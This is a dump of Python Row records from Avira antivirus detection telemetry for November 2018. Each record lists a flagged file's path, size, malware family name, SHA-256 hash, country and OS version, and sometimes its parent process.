  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:43:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210706-2646c9af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210706-2646C9AF', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:06:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171435-9b73e190', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae6e045\\AVSCAN-20181101-171252-890460EC\\AVSCAN-20181101-171435-9B73E190', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:14:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:42:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='031403edb62da430c74609a4a7984b8643826e3baf13511d8f464cfd504b2b8f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\031403EDB62DA430C74609A4A7984B8643826E3BAF13511D8F464CFD504B2B8F', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='031403edb62da430c74609a4a7984b8643826e3baf13511d8f464cfd504b2b8f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oc48ycqq04ewk20i226skqcu 4wms.2miaukieiey2q0kogeeaagc0ommawggyq', filepath='H:\\\xa0\\oC48ycQQ04EwK20i226skQCU 4wms.2MIAUKIeiEY2q0KOgEeAagc0omMAwgGyQ', filesize=24632000, name='WORM/Taranis.2406.#M0.#R0'), hash='4f57433946394d849c81bc6959550b03bd9acbcd166bc7d8dabbd5d43faffc21', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:37:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:54:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gaji rpg.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\GAJI RPG\\GAJI RPG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160212-007eab57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160212-007EAB57', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160334-0e316d05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160334-0E316D05', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\GAJI\\work new\\upah training\\training.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T13:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180451-69f577bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180028-3AA46632\\AVSCAN-20181101-180451-69F577BF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='netdde.exe', filepath='D:\\Backup\\Windows\\system32\\dllcache\\netdde.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='44714fce924026199d2ada331195521ba40007b6c652d7c92d88742d5966db6b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210428-4b1b0170', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210428-4B1B0170', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000817-45dfd2f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12d19096\\AVSCAN-20181102-000757-4318F123\\AVSCAN-20181102-000817-45DFD2F9', filesize=1664000, name='TR/Atom.diukt.#M1.#R1'), hash='70b12a0532bd469190d928d5abb80014175985bb2a371c9bdf13aa0a2cd8fe0b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:08:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110656-dc02938d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110656-DC02938D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='اللعبه.exe', filepath='E:\\صلاح الدين\\اللعبه.exe', filesize=3584000, name='W32/Virut.Gen.#M1.#R1'), hash='d98dfc774769f6028eee6ee05047c3a5cb619068d319c01311cbb36c115e06f9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:WsoFSn65fkG2WP1I.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-01T13:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='bc75c6a3308099e42f4ae65faa54c9b03263f549a88b333609852711522acb31', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='blackshot_be.exe', filepath='\\?\\J:\\BlackShot\\System\\blackshot_BE.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='93505dace6428368ee9b4216003976c4955612997b29218056b4135cb412d0f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183200-479231e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183200-479231E1', filesize=64000, name='VBA/Dldr.Agent.qydjb.#M1.#R1'), hash='9213945835b546068fe6f16eca3601a864e18182394e6af9baad8cc437babd70', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Övrigt\\Pixologic ZBrush 4R8 P2 + Crack (x64) - [CrackzSoft]\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T16:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124023-3c1e511c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124002-2A081859\\AVSCAN-20181101-124023-3C1E511C', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111900-37673f19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111900-37673F19', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094527-c9c6023a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_64173974\\AVSCAN-20181101-093819-A473AFA1\\AVSCAN-20181101-094527-C9C6023A', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081022-709ee1f0', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081003-5B266F58\\AVSCAN-20181101-081022-709EE1F0', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-021833-de7aa536', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd5703d2\\AVSCAN-20181101-021814-D9EB56DA\\AVSCAN-20181101-021833-DE7AA536', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:18:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='olreg.exe', filepath='C:\\Users\\X\\CyberLink\\OLReg\\OLReg.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105942-a556a9db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105942-A556A9DB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105659-90cecdf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105659-90CECDF9', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:56:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-214619-32fd1d7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93bac124\\AVSCAN-20181031-214509-2A1935B3\\AVSCAN-20181031-214619-32FD1D7D', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:46:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='advertisement.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\advertisement\\advertisement.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\soft\\nhm_windows_1.9.0.5\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-073356-e5557870', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-073316-73881F52\\AVSCAN-20181101-073356-E5557870', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:33:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:33:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rhino_6_patch.exe', filepath='c:\\users\\X\\downloads\\rhino_6_patch\\rhino_6_patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T17:09:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002852-6200a573', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002852-6200A573', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200225-2119b70d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c808d757\\AVSCAN-20181101-200130-1AAD6801\\AVSCAN-20181101-200225-2119B70D', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0011682.exe', filepath='E:\\System Volume Information\\_restore{69212C0F-784E-4A08-A5CD-0319A60006C2}\\RP6\\A0011682.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='399d4a6484ff9146f27547cd0af5b5283b477d3afe4ead58b4b9ba591471781b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003204-76d8c7c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003204-76D8C7C7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:01:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153441-b2178dbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a955cb2e\\AVSCAN-20181101-153244-A478C5C4\\AVSCAN-20181101-153441-B2178DBD', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:34:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='C:\\Program Files\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:35:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132950-1fec4260', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_738a12ab\\AVSCAN-20181101-132647-066AE628\\AVSCAN-20181101-132950-1FEC4260', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002501-48e6d64d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002501-48E6D64D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='554518d4f54f9514936f6ba60ff8a41fc9bd6bca037bea96e4537196cc8a0c89.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\554518D4F54F9514936F6BA60FF8A41FC9BD6BCA037BEA96E4537196CC8A0C89.VIR', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='554518d4f54f9514936f6ba60ff8a41fc9bd6bca037bea96e4537196cc8a0c89', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T06:50:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000114-a0490fea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_795da42e\\AVSCAN-20181102-000015-9A6B6AAB\\AVSCAN-20181102-000114-A0490FEA', filesize=128000, name='Adware/Elex.jqroq.#M1.#R1'), hash='746675aec8ff442b3790eda5851cc966840eef98c7626c54e747f0f86df7dee1', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T20:01:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='win2k_xp.exe', filepath='E:\\driver\\dellinspiron1440driversoundxp\\Audio\\HDAQFE\\win2k_xp\\win2k_xp.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='3a456cb208c1ffaee7212664a2bbb5b1842c0bf87bba71e9109879aa0b626d7e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005510-21f6eaa2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-230344-574DB10D\\AVSCAN-20181102-005510-21F6EAA2', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:55:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unrar.exe', filepath='C:\\Program Files (x86)\\WinRAR\\UnRAR.exe', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='51f05e67de195aa9ccfb154716f37be3014d31144102385acbb2c70fb51b0404', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:v\\\\\\/FcLQM9AEebhkFo.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T14:16:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d3dx9.dll', filepath='D:\\Vape_2.47 Cracked by furyzzyt - Minecrafthax.net\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T08:54:51Z'), dt=datetime.date(2018, 11, 1)),
